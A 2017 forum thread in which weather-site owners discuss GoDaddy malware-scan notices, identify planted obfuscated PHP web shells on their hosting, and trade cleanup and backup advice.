WXforum.net

Miscellaneous Debris => Tech Corner => Topic started by: PaulMy on August 24, 2017, 08:36:54 PM

Title: GoDaddy flagged for malware
Post by: PaulMy on August 24, 2017, 08:36:54 PM
I received an email today from GoDaddy which, in part says:
Quote
Our scans flagged your komokaweather.com hosting accounts as containing possible malware.
Please sign in to your hosting account and review the following content and remove or fix the files listed below:

html/.errordocs/missing_bck_old.php

html/j-template/admin/menu/updateMenu.php
(9 more files in Meteotemplate files folder)

html/komokaweather-ca/ec-icons_gif/14p60_noversion.php
html/komokaweather-ca/wsMetNoSA/lang/wsLanguage-de-local_infoold.php
html/wsMetNoSA/lang/wsLanguage-en 2_ver1.php
(3 more add on script files in my Saratoga template folder)

Weather28/ewn_frc/js/highcharts.min.js

html/pws-mysql/eq.php
html/pws-mysql/eqfolder/eqlist.php
html/pws/eq.php
html/pws/eqfolder/eqlist.php

and a few more

Call our security experts at 1-866-938-1119 for assistance.
Prevent future infections.
Add GoDaddy Website Security to your site, so this doesn't happen again.
•    Scan and remove malware.
•    Stop malware before it reaches your site.
•    Detect security gaps and back doors before they're exploited.


These files are mostly from my Meteotemplate, Leuven and PWS templates, and some are redundant old versions that I had not removed from my webserver so will be doing that now.

I called GoDaddy to make sure this is a legitimate message and it is.  GoDaddy says they have done a scan, which he said they rarely do, and those files showed up.  I can have them clean the files for a $300 fee and subscribe to their Website Security to avoid this happening in the future.  However they are not telling me at this time that I actually have to do anything.

Anyone experienced this before, or is this a GoDaddy solicitation for their services?

Paul
Title: Re: GoDaddy flagged for malware
Post by: Bushman on August 24, 2017, 09:05:08 PM
IME GoDaddy always tries to get money from you.  Caveat emptor.  (How do you think he pays for the girls??)
Title: Re: GoDaddy flagged for malware
Post by: ValentineWeather on August 24, 2017, 10:23:33 PM
I'm not seeing anything using malwarebytes and Panda while visiting site. They are continually trying to sell or have me upgrade something. I think it's more likely a scam for money, but by GoDaddy. 
Title: Re: GoDaddy flagged for malware
Post by: saratogaWX on August 24, 2017, 10:34:38 PM
The files

html/komokaweather-ca/ec-icons_gif/14p60_noversion.php
html/komokaweather-ca/wsMetNoSA/lang/wsLanguage-de-local_infoold.php

May actually *be* malware .. there are no PHP icons in ec-icons, and the _infoold addition to wxLanguage-de-local.php looks suspicious.  You should download those files, zip em up and send to me.. I can take a look.

Also send any Saratoga add-on files that were flagged.  It's possible a miscreant inserted stuff in your site in those files.
Title: Re: GoDaddy flagged for malware
Post by: PaulMy on August 25, 2017, 12:28:28 AM
Thanks Ken, sent PM.

Regards,
Paul
Title: Re: GoDaddy flagged for malware
Post by: wvdkuil on August 25, 2017, 03:53:12 AM
Good morning Paul,

To add to Ken's comments, those files should NOT be on your server and they are "normally" not in the download zip either. I just checked.
wsMetNoSA/lang/wsLanguage-de-local_infoold.php   correct name => wsLanguage-de-local.txt
wsMetNoSA/lang/wsLanguage-en 2_ver1.php  correct name => wsLanguage-en.txt

weather28/ewn_frc/js/highcharts.min.js 
=> the folder ewn-frc/ is not used anymore, as  Henkka continually enhances the ewn scripts, so they  are run in an iframe now. You can delete the complete folder as they are not relevant for Canadian users.
=> I compared your weather28/..../highcharts.min.js   file with the original distribution, they are identical, so this is a "false positive"

Question 1: can you please give the links to the other "3 more add on script" files? Those are not Saratoga ones, maybe Leuven?

Question 2:
The big question is: How do those files arrive at your sites? Someone is/was uploading those files.
You host multiple websites with different URL's, is only one site flagged or more then one?
If multiple sites are compromised, do you use multiple FTP ID/passwords, one for every site?
Or do you use 1 FTP ID/password for all sites?

Wim
Title: Re: GoDaddy flagged for malware
Post by: CNYWeather on August 25, 2017, 06:01:26 AM
I have gotten the same message from GoDaddy too.

Check those files carefully. There were some image files that had copies renamed with a .php extension
injected into my site also. I was flagged and had to remove them all. There were a few from GoDaddy
that weren't actually malware when they thought they were. How they keep getting put on my server
is a real head scratcher to me.
Title: Re: GoDaddy flagged for malware
Post by: Jáchym on August 25, 2017, 06:28:29 AM
Paul can you please post the 9 links to MT pages?
Title: Re: GoDaddy flagged for malware
Post by: PaulMy on August 25, 2017, 09:23:15 AM
Ken has given a suggestion which I am trying. 
I am a little busy this morning with other things so will be later today before I can get back to @Jachym and @Wim.

Thank you all for your assistance.
Paul
Title: Re: GoDaddy flagged for malware
Post by: SLOweather on August 25, 2017, 09:40:07 AM
I have a water company site hosted on a reseller Godaddy site, and received a similar email a few months ago, without the sales pitch.

They flagged some files that were indeed malware, as well as some legit ones. I copied off the bad ones for reference, and deleted them.


Anyone experienced this before, or is this a GoDaddy solicitation for their services?

Paul
Title: Re: GoDaddy flagged for malware
Post by: saratogaWX on August 25, 2017, 11:16:33 AM
The files

html/komokaweather-ca/ec-icons_gif/14p60_noversion.php
html/komokaweather-ca/wsMetNoSA/lang/wsLanguage-de-local_infoold.php

May actually *be* malware .. there are no PHP icons in ec-icons, and the _infoold addition to wxLanguage-de-local.php looks suspicious.  You should download those files, zip em up and send to me.. I can take a look.

Also send any Saratoga add-on files that were flagged.  It's possible a miscreant inserted stuff in your site in those files.
Yep.. those files are indeed malware - heavily obfuscated, but a remote PHP shell that can process HTTP request arguments into a PHP eval() statement, which causes their remotely-supplied code to be executed on your webserver.  Make note of the date/time stamps on the files, then delete them.  If you have Apache logs containing records from those timestamps, we could look back and see what other mischief has been done by them.
Title: Re: GoDaddy flagged for malware
Post by: PaulMy on August 25, 2017, 09:20:20 PM
@Wim,
Quote
To add to Ken's comments, those files should NOT be on your server and they are "normally" not in the download zip either. I just checked.
wsMetNoSA/lang/wsLanguage-de-local_infoold.php   correct name => wsLanguage-de-local.txt
wsMetNoSA/lang/wsLanguage-en 2_ver1.php  correct name => wsLanguage-en.txt
I have deleted these.

weather28/ewn_frc/js/highcharts.min.js 
=> the folder ewn-frc/ is not used anymore, as  Henkka continually enhances the ewn scripts, so they  are run in an iframe now. You can delete the complete folder as they are not relevant for Canadian users.
=> I compared your weather28/..../highcharts.min.js   file with the original distribution, they are identical, so this is a "false positive"
I have deleted this.

Question 1: can you please give the links to the other "3 more add on script" files? Those are not Saratoga ones, maybe Leuven?
I have sent these to Ken for his review.

Question 2:
The big question is: How do those files arrive at your sites? Someone is/was uploading those files.
Not by me and don't know how.  I have only given authority to one person to access my site and that was for a specific /folder about 2 years ago.  This person is totally trustworthy.

You host multiple websites with different URL's, is only one site flagged or more then one?
komokaweather.com is my main hosting and the files GoDaddy listed were all in subfolders
/weather28 for Leuven (only the ewn_frc/js/highlights, and the others in an old weather2 version folder, which I have now deleted)

/komokaweather-ca for Saratoga (four files were listed, and I've sent these to Ken)
/pws for Brian's HomeWeather (17 files listed, but 13 were in old version folders that I have now deleted)
/j-template for Meteotemplate (10 files were listed)
/weather for Cumulus modified template ( seven files listed)
/wsMetNoSA for your older MetNo script ( one file listed, and now deleted as noted above)
/.errordocs ( one file listed - missing_bck_old.php, which I have now deleted)
With the exception of the /j-template and /pws the other files had a date stamp of several years ago.


If multiple sites are compromised, do you use multiple FTP ID/passwords, one for every site?
Or do you use 1 FTP ID/password for all sites?
I use one FTP ID and password only to my webserver.

Wim

@Jachym

Quote
can you please post the 9 links to MT pages?
I will send you an email.

Thank you all for your replies and very helpful suggestions and comments.
Paul

Edit,
I also have two additional domains in my hosting plan for a couple of local not for profit organizations that I maintain and there were no files from these folders on the GoDaddy listing.
Paul
Title: Re: GoDaddy flagged for malware
Post by: Bashy on August 26, 2017, 12:47:32 AM
I find that downloading you site as a backup can kill 2 birds an all that, 1 you have a backup and 2 you can set malware bytes
to scan the new backups, i host a few weather sites on my server and the backups are auto downloaded to 2 drives at home
where MB does its thing, this will eliminate any issues quickly, if something is found i will let the client know asap.

Periodically downloading your backup instead of leaving it in the hands of your host would pick this is long before now, plus, you
should never rely on your host for the safety of your data anyway
Title: Re: GoDaddy flagged for malware
Post by: 92merc on August 26, 2017, 12:23:54 PM
I've received 2 emails over the past 6 months from GoDaddy flagging malware.  In the first one, I had something 8 files flagged.  6 were old and I removed them.  One said my httaccess file was "infected".  I did some research and took out some entries that weren't needed.  Last one was my Fire Index page.  I left that alone.

Months later, I get another email.  Now it's totally different files.  A few I deleted again as they weren't needed from a sub domain I have.  But my original Fire Index file didn't show up this time even though I hadn't changed it.

After the first email, I did get a call.  I got the impression they wanted to sell me something.  I just told the guy I deleted all those files and he shut up.  Never got a second call.
Title: Re: GoDaddy flagged for malware
Post by: saratogaWX on August 26, 2017, 01:55:44 PM
You may have a lurking malware script from an earlier successful compromise on your site, and that's how they got in again.

Title: Re: GoDaddy flagged for malware
Post by: dasman on August 29, 2017, 11:37:04 PM
I got the same email last Thursday from godaddy. They flagged 16 files. After looking through them 13 were indeed malware. Also the htaccess file was compromised.  I too got the sales pitch. All 13 files are deleted, and the htaccess file is restored. However on Google my index page is tagged with Viagra and another page with Cealis. I need the Google bot to recrawl the site. :-(
Title: Re: GoDaddy flagged for malware
Post by: Bushman on August 30, 2017, 12:37:44 AM
How are all these sites being compromised?
Title: Re: GoDaddy flagged for malware
Post by: Bashy on August 30, 2017, 12:40:30 AM
prob many scripts used and some are outdated